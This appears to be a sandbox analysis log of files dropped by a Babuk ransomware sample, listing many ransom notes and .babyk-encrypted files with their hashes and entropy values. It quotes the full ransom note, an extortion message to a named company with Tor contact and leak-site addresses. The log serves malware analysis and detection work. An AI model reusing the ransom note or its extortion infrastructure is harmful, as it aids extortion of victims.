                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Advertising.Xaml_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.501206726929283
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlVQJJbU/5l2JtTAuDMrigvt9F4jYpDwt1tmJoD7K0EuzqgshfEUlG9UxNvEEn:FQJJQc5AuD62jYpsLt+kv2gM00vtn
                                                                            MD5:D90799B6186557571E16AD329854B86F
                                                                            SHA1:C0758EC199893EB0060DD4878DFD857ACAF4A16C
                                                                            SHA-256:4A21140D3B8D5EEF640894034F7A733D460AEC8532FEF54D18F1403745AC19A0
                                                                            SHA-512:964995FDB5470C8B0891CA036D5A2CD1FEACEAB778FE868D37EFF6B0820CD7BB4C7D26384CD6CD59C90A9488AD00A71B478605AE45B46690403752B99B36546D
                                                                            Malicious:false
                                                                            Preview: ..........l....)1.h.......H.B%7.ht......;.H.u@{..'...1.).=..QL.....H..P.d....<.Z...Z....8..@..G........PE.:...h..~..hR.o2!x.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.975153723560495
                                                                            Encrypted:false
                                                                            SSDEEP:192:BZ+ZqK6YXUAQoYE3cFQYKvUAwxjAnj8Utt31JB7k:BkZkYZQxE3cNS5RnQc1J1k
                                                                            MD5:A0D9F6687229121106E811C7A5C51FA8
                                                                            SHA1:A02E11ED145981B617703481F580100A74BFBBD0
                                                                            SHA-256:B7878207A07E96D6253C3FA89F20C596CDFDADCB55C8C605C458181E1DB858DB
                                                                            SHA-512:B498B93C92500A71A913C8724392670895E31FE859CB1F5D2287A5B1B94208C2A46E36D0C7738FB188D2308DBF46412C59C3CF0EDF65A9B091942783EB83CC19
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.AsyncTextService_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.622078789348674
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlwOBv078IK6otEuNC1HUSYcMzIcge3JIXTuJ9UxNvEEn:gOZ0gIfotEOgHUr9kBe5IXTA0vtn
                                                                            MD5:39C2C22BB4CE1FF03963BF079DDC2098
                                                                            SHA1:ACBD455839CDF0C222FF777F0A4C3528BA994654
                                                                            SHA-256:963199565D364702EC1439D8C7A47139B535D40CE354F860FC663C28EE8717DA
                                                                            SHA-512:730034EF3B2F3B352072B56B7A618F3C1C26DDBE5705927B905239DCDECC0065358B9FF17FEC8EFB08B6311D32CEF0A7FAFEFB8D1CA24E837D61EED42E0093EE
                                                                            Malicious:false
                                                                            Preview: ....i.,...._..I..4M.1...9S...1;.Q...........>'D...*.C.6...k..".......L....9..B.ZN.|G.=....21.\....a..U.-...`'K.o\...!...|W..y....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG1.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.977399883306356
                                                                            Encrypted:false
                                                                            SSDEEP:192:Wk4WXEICvmvEGn89ODOo1fIwCRrPmIcIbDRsqsErOrEkc2ZLPf:JFhCvmv1OoURruIcm+tEqr91xPf
                                                                            MD5:AA8D19DD00D1227186F1BB2ABCDD38B8
                                                                            SHA1:186111A37202C516D764FF5BCF82948DE02AF0CE
                                                                            SHA-256:E7D79A479D48AC9086AF6CEF38F827357F6C9C7881185336591EB04DD8CD6D96
                                                                            SHA-512:F12266DD94E988AF265DADB4A2450A48281377CA285CFC33207BC0B563F0CE43E343DF45C148135EA4478BBEB5006C2CA95CE006DE9D2244B9BED9D472505A92
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.LOG2.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.521503807490097
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlaJ3AJEBVWgffRKUo2grgoWa6miFQsXebXY1WCDz0NLUxNvEEn:q+OVWaZPo2grgmUXerY1RUNL0vtn
                                                                            MD5:D3FEADD9B4696E53244C1781F867E660
                                                                            SHA1:E6CDA1DE55B8AB714678B7FC5C08C981FA5F47E5
                                                                            SHA-256:7A483E0D51F12C26520FCBEEE21E84D9CF272F24EF7A9521321C71B07269D89D
                                                                            SHA-512:90277F104A82AD2B7941E2FA5C7A37AD09BEBEE81BE54AC506AE30A873FE1733470EAD00F2813360D67140DA9679E706C16E2434818C51B4217F5B3B65D831F7
                                                                            Malicious:false
                                                                            Preview: .......b.@.........7....D...B.....6;(wz:|..o..%.>...}.h#....r.|.[..N..3.e....O.d..uE......,4.d..v+..].....ha..{.l.j.N..zh(K.n.......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.978506246956479
                                                                            Encrypted:false
                                                                            SSDEEP:96:aWEeSpcodiatMDaZJIvQz0d+hdrUULJc+7xcSKEP9p/Q3P4OV1O70+noh54R0MuF:up5da5IhFVcLE1p/Q/48c19KCw0iL
                                                                            MD5:A252897490131EBD1C1CD225C595B42F
                                                                            SHA1:AB09AFD13FED8B1FCDC51B9336EF2ED1556267DF
                                                                            SHA-256:0872AD404E32EDA863328D0034EA3C10301EA0C25DEEE0F04455308D3D9EF4F7
                                                                            SHA-512:468E0B07977EBAF198133BE4C3577F11F74E6F57FAB9AC163635E2C6DF1F436AF5025905FFB3C15F46A29C26149DBB9E47846869B4FD947F546B5A804B3B77B5
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BingWeather_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
